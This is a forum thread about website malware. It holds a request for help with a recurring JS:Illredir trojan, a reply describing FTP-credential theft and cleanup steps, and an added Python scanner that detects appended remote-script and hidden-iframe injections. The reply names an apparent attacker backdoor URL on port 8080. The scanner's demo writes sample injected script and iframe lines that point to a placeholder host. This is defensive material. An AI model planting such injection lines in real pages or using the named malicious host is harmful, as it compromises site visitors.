My websites www.edesimusic.net and www.juraatmedia.com are infected with JS:Illredir-S [Trj] malware. My sites keep getting infected with some redirects or JS scripts or iframe scripts; after cleaning them I change my passwords, and it comes back again after a few days.

Can anyone tell me how to protect my websites properly and how to remove this virus JS:Illredir-S [Trj]? I am not getting any information about this virus or about which file on my server is infected with it.

Please help me!

A: 

Hi everyone,

I had the same problem: Windows up to date, antivirus up to date (AVG on the first and Symantec on my second computer), antispyware up to date... I never install "strange things", so I thought that I was protected. Suddenly all of the sites/accounts in my FileZilla were infected by a JS:Illredir-CB [Trj] trojan.

It happened after visiting the website of a big company. This trojan came onto my computer without any warning... so easy. The script was a JavaScript function: all kinds of tricks to create a link to a remote site on port 8080. This one put a Java applet in an iframe, and this opened a CMD in the background which installed some files locally in system32.

What I did:

  1. DELETE all your FTP login settings, or set all the accounts to "ask for password".
  2. I changed ALL the settings of the FTP accounts. (DO IT, because I forgot one, and this one was touched again 3 days later.)
  3. Scan your computer entirely. I noticed at this moment that only AVAST detected this one (I did try a lot of scanners).
  4. ALL your FTP sites are touched... and every folder... in my case also the https files... so you have to check all the files (check them by date/time).

Check all the .js files and all the files with names like "home", "default" and "index"... at the bottom of the file an extra line is written. (They are not all the same!!... but look-alike.) Some of my files were totally corrupt, so I had to take the backup for those ones.

In the FTP log files of the server I see several times an attempt to connect with the old settings... so they try it more than once.


I took a good look at the scripts which infected my computer: in my case the function opened the backdoor to [ http:// highstate . ru: 8080 /google.com/stumbleupon.com/btjunkie.org.php ], but I saw in some other scripts that highstate.ru is not the only domain... Check these links for what Norton says about these domains: [ https:// safeweb.norton.com/ report/show?name=anyscent.ru ] or [ https:// safeweb.norton.com/ report/show?name=highstate.ru ]


Latest ones I saw:
index.html: JS:Illredir-CB [Trj] ++ exemple.htm [L] HTML:Downloader-F [Trj] ++ Applet1.htm [L] JS:Jaderun-A [Expl], all by the same method: a remote script at the bottom of a webpage / JS file.

Nice example: at this moment there is a trojan on THIS SITE: [ http:// wordpress.org /support/topic/349452 ]. My AVAST saw this one and disabled the page.

I hope somebody can do something with my experience!!

( :-) sorry about the language mistakes, but I am Dutch (-: )

Kind regards, Harts from Holland

Harts
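The answer above describes the infection shape: an extra line appended at the bottom of index/default/home pages and .js files, carrying a remote script or hidden iframe (often to a host on port 8080). The following scanner is an added example, not code from either poster: it walks a site tree, checks only the last few lines of those candidate files, and reports matches. The sample site it builds is constructed for the demo; the host names in it are placeholders.

```python
import re
import tempfile
from pathlib import Path

# Files the post says were touched: every .js file plus pages named index/default/home.
PAGE_NAME = re.compile(r"^(index|default|home)\.", re.IGNORECASE)
PAGE_SUFFIXES = {".htm", ".html", ".php"}

# Shapes of the appended line described in the post: a remote <script>, a hidden
# <iframe>, a link to a host on port 8080, or an obfuscated document.write.
INJECT_PATTERNS = [
    re.compile(r"<script[^>]*\ssrc=[\"']?https?://", re.IGNORECASE),
    re.compile(r"<iframe[^>]*\s(width|height)=[\"']?0\b", re.IGNORECASE),
    re.compile(r"https?://[^\s\"'<>]+:8080/", re.IGNORECASE),
    re.compile(r"document\.write\(\s*unescape\(", re.IGNORECASE),
]

def is_candidate(path: Path) -> bool:
    suffix = path.suffix.lower()
    return suffix == ".js" or (suffix in PAGE_SUFFIXES and PAGE_NAME.match(path.name) is not None)

def scan_file(path: Path, tail: int = 3) -> list:
    """Return (line_no, text) for each of the last `tail` lines matching an injection pattern."""
    lines = path.read_text(errors="replace").splitlines()
    hits = []
    for idx in range(max(0, len(lines) - tail), len(lines)):
        if any(p.search(lines[idx]) for p in INJECT_PATTERNS):
            hits.append((idx + 1, lines[idx].strip()))
    return hits

def scan_tree(root) -> dict:
    """Map relative path -> hits for every candidate file under root that has at least one."""
    root = Path(root)
    findings = {}
    for path in sorted(root.rglob("*")):
        if path.is_file() and is_candidate(path):
            hits = scan_file(path)
            if hits:
                findings[path.relative_to(root).as_posix()] = hits
    return findings

def demo() -> dict:
    """Constructed sample site (hypothetical, not a real infection) run through scan_tree."""
    with tempfile.TemporaryDirectory() as root:
        site = Path(root)
        (site / "js").mkdir()
        (site / "about.html").write_text("<html><body>clean page</body></html>\n")
        (site / "index.html").write_text(
            "<html><body>home</body></html>\n"
            '<script src="http://bad.example.invalid:8080/google.com/x.php"></script>\n')
        (site / "js" / "main.js").write_text(
            "function init(){}\n"
            'document.write(unescape("%3Ciframe src=\'http://bad.example.invalid/\' width=0 height=0%3E"));\n')
        return scan_tree(site)

if __name__ == "__main__":
    for rel, hits in demo().items():
        for line_no, text in hits:
            print(f"{rel}:{line_no}: {text}")
```

Point `scan_tree` at a local copy of the site and compare its findings against file modification times from the FTP server, as the post suggests; anything it flags should be diffed against a known-clean backup rather than edited in place.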